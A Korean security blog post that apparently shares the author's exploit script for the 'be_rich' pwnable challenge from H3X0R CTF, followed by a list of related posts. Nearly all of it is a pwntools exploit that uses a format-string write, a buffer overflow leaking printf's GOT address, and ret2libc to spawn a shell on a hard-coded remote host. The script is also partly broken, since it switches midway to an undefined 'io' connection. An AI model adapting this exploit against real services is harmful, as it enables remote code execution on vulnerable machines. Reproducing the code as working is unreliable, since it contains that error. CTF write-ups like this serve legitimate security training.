cdor1's lab
H3X0R CTF be_rich 본문
후기 : 예전에 썼던 익스코드를 까먹고 안올렸다.
H3X0R CTF 포너블 문제 끝
from pwn import *
s = remote('52.199.49.117', 10002)
elf = ELF('/home/cdor1/pwn100')
print s.recvuntil('Give me your name!')
s.sendline('%100000d%7$n')
print s.recvuntil('Comment :')
pay = 'A'*32
pay += p32(elf.plt['printf'])
pay += p32(0x80488df)
pay += p32(elf.got['printf'])
s.sendline(pay)
print s.recv(2048)
leak = u32(s.recv(4))
binsh = leak + 0x1140c4
system = leak - 0xd0f0
pay2 = "A"*33
pay2 += p32(system)
pay2 += 'AAAA'
pay2 += p32(binsh)
io.recvuntil('Give me your name!')
io.sendline('%100000d%7$n')
io.recvuntil('Comment : ')
s.sendline(pay2)
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| Codegate2016 발표준비 (0) | 2017.01.25 |
|---|---|
| 0ctf zerostorage (0) | 2017.01.25 |
| pwnable.tw start (0) | 2017.01.24 |
| YISF 2016 pwn200 (0) | 2017.01.21 |
| WITHCON Final jnjn (0) | 2017.01.20 |
Comments